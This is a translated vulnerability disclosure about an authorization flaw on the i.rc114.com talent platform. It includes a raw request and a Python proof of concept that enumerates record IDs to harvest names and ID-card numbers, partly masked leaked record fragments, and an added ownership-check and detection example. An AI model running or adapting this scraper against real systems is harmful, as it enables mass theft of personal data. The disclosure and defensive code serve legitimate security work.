2015-03-27: Details sent to the vendor; awaiting vendor handling
2015-04-01: Vendor confirmed; details disclosed to the vendor only
2015-04-11: Details disclosed to core white hats and experts in the relevant field
2015-04-21: Details disclosed to regular white hats
2015-05-01: Details disclosed to intern white hats
2015-05-16: Details disclosed to the public
Broken authorization leaks large volumes of users' private information
Chengdu Talent Service Platform, URL:
http://i.rc114.com
As shown in the figure, register an account, log in as a legitimate user and edit your personal information.
The following HTTP POST request is sent:
POST /RealNameRegistration.aspx/getRealNameInfoByPno HTTP/1.1
Host: i.rc114.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://i.rc114.com/RealNameRegistration.aspx
Content-Length: 15
Cookie: Hm_lvt_57c48c2407b9363122624c39f3e251df=1415000092,1415061514,1415150093; Hm_lvt_fe01b1430376b312631b121e55200580=1427341437; ASP.NET_SessionId=xf5zmts1my1232weeitx03lv; Hm_lpvt_fe01b1430376b312631b121e55200580=1427341473
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{ pno:'595000'}
However, the pno value above is not bound to the logged-in user: it can be enumerated starting from 1, and the endpoint returns other people's registration information, including name, ID-card number, graduating school and more. Roughly 600,000 records are affected. The PoC below retrieves the data at a slow rate:
# Python 2 (httplib); the original PoC, reflowed onto separate lines.
import httplib
import time
import codecs


def crawl(strnum, file, id):
    """Request the record for one pno and append the raw response to file.
    Returns 1 on an HTTP error (caller retries), 0 on success."""
    paramTemplate = '''{ pno:%s}'''
    body = paramTemplate % strnum
    headers = {
        'Host': 'i.rc114.com',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/json; charset=utf-8',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'http://i.rc114.com/RealNameRegistration.aspx',
        'Content-Length': str(len(body)),
        'Cookie': 'Hm_lvt_57c48c2407b9363122624c39f3e251df=1415000092,1415061514; Hm_lvt_fe01b1430376b312631b121e55200580=1415002633,1415003018,1415061505; ASP.NET_SessionId=53k2lzvxa41kle5rxw2qxz1d; Hm_lpvt_fe01b1430376b312631b121e55200580=1415083567; Hm_lpvt_57c48c2407b9363122624c39f3e251df=1415061514',
        'Connection': 'keep-alive',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache',
    }
    try:
        conn = httplib.HTTPConnection('i.rc114.com', 80)
        conn.request('POST', '/RealNameRegistration.aspx/getRealNameInfoByPno', body, headers)
        response = conn.getresponse()
        print response.status, response.reason
        data = response.read().decode('UTF-8')
        file.write('id=%s:' % id)
        file.write(data)
        file.write('\n------------------------------------------------\n')
        conn.close()
    except httplib.HTTPException, e:
        # The original referenced an unimported HTTPException and a non-existent
        # e.code, and its `finally: return 0` swallowed this retry signal.
        print e
        return 1
    return 0


def main():
    f = codecs.open('db.txt', 'a', 'utf_16')
    for i in range(600000, 600010):
        strnum = str(i + 1)
        while crawl(strnum, f, str(i)):
            pass
        time.sleep(10)
    f.close()


if __name__ == '__main__':
    main()
With the PoC above, roughly 600,000 user registration records can be obtained, including name, ID-card number, graduating school and major. (The area below is one very long line; select it and use right-click > View Source to see the full content.)
*****ode**********ot;ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027四川电力职业技术学院\u0027,\"gradtime\":\u00272006-07-01\u0027,\"major\":\u0027电力**********------------**********tpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027电子科技大学\u0027,\"gradtime\":\u00272004-06-30\u0027,\"major\":\u0027电子信息工程(电^**********------------**********\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南交通大学\u0027,\"gradtime\":\u00272009-01-05\u0027,\"major\":\u0027电气工^**********------------**********\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027硕士\u0027,\"gradschool\":\u0027四川大学\u0027,\"gradtime\":\u00272010-07-01\u0027,\"major\":\u**********------------**********27,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南交大\u0027,\"gradtime\":\u00272005-07-12\u0027,\"major\":\u0027电气工^**********------------**********027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027中专\u0027,\"gradschool\":\u0027成都铁路运输技工学校\u0027,\"gradtime\":\u00271997-07-01\u0027,\"major\"**********------------**********:\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027四川师范大学\u0027,\"gradtime\":\u00272005-06-30\u0027,\"major\"**********------------**********ot;ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027太原电力高等专科学校\u0027,\"gradtime\":\u00272000-07-01\u0027,\"major\":\u0027发^**********------------**********027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南交通大学\u0027,\"gradtime\":\u00272005-07-01\u0027,\"major\":\u002**********------------**********ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027上海应用技术学院\u0027,\"gradtime\":\u00272001-06-29\u0027,\"major\":\u0027食品化工^**********------------**********u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027硕士\u0027,\"gradschool\":\u0027四川大学\u0027,\"gradtime\":\u00272006-06-30\u0027,\"major\":\u002********
**------------**********7\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南民族大学\u0027,\"gradtime\":\u00272005-06-01\u0027,\"major\":\u002**********------------**********0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027四川大学\u0027,\"gradtime\":\u00272003-06-30\u0027,\"major\":\u0027广播^**********------------**********27,\"ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027成都电子科技大学\u0027,\"gradtime\":\u00272002-06-30\u0027,\"major\":\u0027^**********------------**********0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027电子科技大学\u0027,\"gradtime\":\u00272002-08-01\u0027,\"major\":\u0027^**********------------**********ytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027硕士\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027**********cpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\**********------------**********7,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\**********------------**********cpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\**********------------**********cpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\**********------------**********":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027中等专科\u0027,\"gradschool\":\u0027成都卫校\u0027,\"gradtime\":\u00272015-07-01\u0027,\"major\&quo**********------------**********ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\********
**------------**********,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\**********------------**********ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\**********------------**********7,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\**********------------**********27,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\**********------------********************cod*****
Add authorization checks.
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-04-01 13:31
CNVD confirmed and reproduced the reported issue; it has been forwarded by CNCERT to the Sichuan branch, which will coordinate handling with the website's operating organization.
None
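The root cause above is that the endpoint trusts a client-supplied pno instead of binding the lookup to the logged-in session. The following is an added example, not code from the report or from the rc114.com site, showing the shape of the missing check (the record may only be read by the session that owns it) together with a log scan that flags a session walking through sequential pno values, which is the enumeration pattern described in the report. The record store, session table, access-log lines and function names are all constructed for the example; the request body is assumed to be strict JSON rather than the unquoted form the original ASP.NET endpoint accepted.

```python
"""Added example (not from the original WooYun report): a server-side
ownership check for a lookup like getRealNameInfoByPno, plus a log scan
that flags sessions enumerating sequential pno values.
All records, sessions and log lines below are constructed."""
import json
from collections import defaultdict

# Constructed stand-in for the registration table: pno -> record.
RECORDS = {
    "595000": {"name": "user-a", "idcard": "ID-A", "education": "本科"},
    "595001": {"name": "user-b", "idcard": "ID-B", "education": "硕士"},
}

# Constructed session store: session id -> the pno that session owns.
SESSIONS = {
    "sess-a": "595000",
    "sess-b": "595001",
}


class Forbidden(Exception):
    pass


def get_real_name_info(session_id, pno):
    """Return the record for pno only if the session owns that pno.

    The original endpoint returned RECORDS[pno] for any pno the client sent;
    the ownership comparison below is the check it lacked."""
    owner_pno = SESSIONS.get(session_id)
    if owner_pno is None:
        raise Forbidden("not logged in")
    if pno != owner_pno:
        raise Forbidden("pno %s is not owned by this session" % pno)
    return RECORDS[pno]


def handle_request(session_id, body):
    """Parse a JSON body like {"pno": "595000"} and apply the check.
    Returns (status, response_body)."""
    try:
        pno = str(json.loads(body)["pno"])
    except (ValueError, KeyError, TypeError):
        return 400, "bad request"
    try:
        return 200, json.dumps(get_real_name_info(session_id, pno))
    except Forbidden:
        # Same response whether the pno exists or not, so the endpoint
        # cannot be used to probe which pno values are populated.
        return 403, "forbidden"


# Constructed access-log lines: "<unix time> <session id> <pno requested>".
LOG = """\
1427341473 sess-a 595000
1427341480 sess-x 600001
1427341491 sess-x 600002
1427341502 sess-x 600003
1427341513 sess-x 600004
1427341524 sess-b 595001
"""


def flag_enumeration(log_text, min_distinct=3):
    """Return {session: {"count": n, "sequential": bool}} for every session
    that requested at least min_distinct distinct pno values.

    A legitimate user of this endpoint only ever asks for its own pno, so
    several distinct values from one session, especially consecutive ones,
    is the signature of the enumeration the report describes."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        _ts, sess, pno = parts
        seen[sess].append(int(pno))
    flagged = {}
    for sess, pnos in seen.items():
        distinct = sorted(set(pnos))
        if len(distinct) >= min_distinct:
            sequential = all(b - a == 1 for a, b in zip(distinct, distinct[1:]))
            flagged[sess] = {"count": len(distinct), "sequential": sequential}
    return flagged


if __name__ == "__main__":
    print(handle_request("sess-a", '{"pno": "595000"}'))  # own record: 200
    print(handle_request("sess-a", '{"pno": "595001"}'))  # someone else's: 403
    print(flag_enumeration(LOG))  # flags sess-x
```

The detection side is deliberately coarse: on an endpoint where each session legitimately needs exactly one pno, a threshold of a few distinct values per session is enough, and the sequential flag separates a scripted walk from, say, a user re-registering. Rate limiting alone would not have closed this hole; the PoC already sleeps ten seconds between requests.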